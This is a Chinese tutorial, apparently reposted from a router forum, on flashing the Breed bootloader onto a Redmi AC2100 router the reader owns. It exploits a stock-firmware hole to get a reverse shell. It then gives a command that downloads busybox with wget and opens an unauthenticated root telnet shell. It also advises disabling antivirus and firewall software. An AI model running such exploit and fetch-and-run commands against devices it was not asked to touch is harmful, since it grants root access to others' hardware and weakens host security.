Redmi(红米)路由器AC2100目前已经有不死breed,普通人刷路由器之前一定要刷入breed。

Redmi(红米)路由器AC2100据说是之前斐讯的路由器团队做的路由器,在160MHz加持下,配合AX200的无线网卡,可以达到1.7Gbps的速度,再次出现WiFi的速度比网线快的景象。在国内万M网卡推广之前,160MHz的WiFi5将完全吃满千M的网线。Redmi(红米)路由器AC2100因此成了一代神机,在恩山上快速迭代出各种教程和魔改。主要是在完美的硬件下足够便宜方便折腾。
虽然硬件很重要,软件也同样重要。但是在刷机之前,你必须给你的路由器刷入breed,否正后果自负。

目前刷入breed的方法是使用官方系统的漏洞来实现的,随时可能失效,如果有需求的话买的系统越早越好。

所有资源

点击下载所需资源

视频教程

这个UP的教程已经很详细了,我就不截图/拍视频了。

请耐心看完视频教程,如果你无法耐心看完,那说明你不适合干这个。

文字教程

本教程转自恩山,内含我自己刷机时的理解

1、首先说明,如果你现在用的是openwrt固件,boot分区可能有锁,建议更新最新源码编译的openwrt(新源码编译的openwrt已解除boot分区锁)。
2、如果还没刷机(用的官方固件),可以在本帖步骤“二、刷入r3gbreed”开头查坏块。如果你已经刷过机,查坏块方法详见本帖“三、刷入breed后续"。

通过漏洞打开路由telnet

1:在开始菜单-设置-程序-程序和功能-启用和关闭Windows功能,勾选telnet client(或telnet 客户端)

2:从“控制面板网络和 Internet网络连接”把你的所有不相关的网络接口都禁掉,包括虚拟机接口,修改连接路由器的网口地址为192.168.31.177,子网掩码255.255.255.0,默认网关192.168.31.1。

3:关闭所有杀毒软件,关闭防火墙,解压好刷机工具中的breed教程完整版.zip
打开/rm2100文件夹,先安装文件夹里的WinPcap_4_1_3.exe或者npcap-0.9991.exe
之后打开 开启telnet命令.txt一键开启telnet.bat(不用管理员运行)
提前复制好开启telnet命令.txt里面的内容

4:进入路由器,确保路由地址为192.168.31.1,修改好pppoe的账号密码。
账号:123
密码:123
把你的路由器按照如下连接
lan与wan接法

与电脑接的lan口一定要使用第二个lan接口,也就是有两个点的那个lan口

5:执行一键开启telnet.bat,按提示操作,直到反弹shell窗口显示收到数据。

6:把前面复制的

cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh

粘贴到反弹shell窗口(右键为粘贴),回车运行

反弹shell窗口出现的时间很短,请一定要速度快不能有迟疑

至此,路由器telnet功能成功开启

卡反弹shell等问题大概率是电脑系统、防火墙、杀毒软件造成的,如果开telnet你这一步没有成功,就彻底关掉电脑防火墙和杀毒软件(系统建议用win10正版最新),
然后删掉之前文件,关闭所有进程重新解压breed教程完整版.zip再从头走一遍。

注意:路由telnet开启成功后记得把WAN-LAN之间的网线(上面接线图棕色线)拔掉,否则刷入breed后易造成网络风暴。

原厂固件刷入r3gbreed

Win+R ,输入cmd回车打开命令行(也可以用putty或xshell),

telnet 192.168.31.1
cd /tmp

查看坏块的命令是(分析见下文)

dmesg | grep NAND
dmesg | grep '[B|b]ad.*block'
dmesg | grep eraseblock

查看路由当前分区的命令是

cat /proc/mtd

会有四种情况:
1、执行指令没有返回任何信息,翻日志也没找到任何闪存相关信息,重启下路由再找一次。
2、执行后返回信息中有ESMT字样,翻日志也没有显示坏块信息的是ESMT闪存,没有检测到坏块。
3、较为正常东芝闪存返回信息:坏块768。但刷固件一切正常。论坛大佬说“目前我刷过几十次固件,坏块暂时还没有增加。”
4、是东芝闪存而且有问题的路由返回信息如图,坏块90+768,根据调查“90”这个数字还有其他值,推测跟东芝闪存体质有关。
东芝和ESMT用的都是SLC闪存(寿命最长的闪存),而且不少机器只开telnet,不刷固件或breed也出现坏块,所以坏块应该不是刷机造成的,是东芝闪存生产出来自带的(质量参差不齐)。
目前有两种推测:
(1)坏块位置比较靠后,官方固件只用到了前面一部分如kernel0,所以官方固件不影响使用。
(2)官方和op固件屏蔽闪存坏块的机制较为完善(类似u盘量产的时候屏蔽坏块),所以官方和部分op固件可以正常使用。
padavan固件会用到有的坏块区域,如kernel1,所以有的机器不能刷入padavan,或者刷入后使用有问题。

如果你不嫌烦的话,建议使用京东换货来得到ESMT闪存,东芝闪存不适合折腾

想要备份路由原厂分区的,可以先在电脑以管理员权限运行/rm2100中的 ftpdmin.exe,之后回到telnet命令行

例如:想备份mtd1分区,就在命令行输入

./busybox nanddump -f mtd1.bak /dev/mtd1
./busybox ftpput 192.168.31.177 mtd1.bak ./mtd1.bak

备存文件存在你rm2100文件所在的硬盘根目录。不想备份也可以,刷机包给的文件中有mtd1和eeprom的备份。

(注意此时“Task_文件服务器”进程是否还在运行,没运行的再执行一下/rm2100中的httpserver.bat)

备份之后,执行

wget http://192.168.31.177:8081/breed-mt7621-xiaomi-r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write breed-mt7621-xiaomi-r3g.bin Bootloader

将breed刷入路由器

等待5分钟

将电脑改为自动获取ip,等待路由器重启(当电脑获取到ip或者路由只有一个蓝灯亮时,breed引导官方固件成功)。

建议再等待5分钟后拔电,用牙签按住reset键再插电,等蓝灯闪烁,松开reset键,浏览器访问192.168.1.1即可进入breedweb界面。

首次进入breed记得先备份下编程器固件和eeprom。

至此,路由器成功刷入breed。

刷入系统

如果你刷完后进了小米官方的系统或者进不了系统,可以尝试进入breed后增加环境变量 xiaomi.r3g.bootfw 值为2 。 参考 https://www.right.com.cn/forum/thread-4023403-1-2.html

对breed操作不太明白的可以看hackpascal大佬的原贴 https://www.right.com.cn/forum/forum.php?mod=viewthread&tid=161906

推荐一下chongshengB大佬的padavan固件 https://github.com/chongshengB/rt-n56u/releases
刷入openwrt有问题的可以参考 https://www.right.com.cn/forum/thread-4025861-1-1.html
集客0512版本可从breed直接刷入,参考 https://www.right.com.cn/forum/thread-4021056-1-1.html

注意事项

1.火绒对刷机完整包内的部分内容报毒,因此请在虚拟机内刷机
2.与电脑接的lan口一定要使用第二个lan接口,也就是有两个点的那个lan口
3.反弹shell窗口出现的时间很短,请一定要速度快不能有迟疑
4.路由telnet开启成功后记得把WAN-LAN之间的网线(上面接线图棕色线)拔掉,否则刷入breed后易造成网络风暴。


参考:
红米路由器AC2100刷机教程:刷入breed教程
[AC2100(RM2100)] 红米/小米AC2100刷入r3g breed以及恢复官方boot详细教程

最后修改:2020 年 10 月 25 日
如果觉得我的文章对你有用,请随意赞赏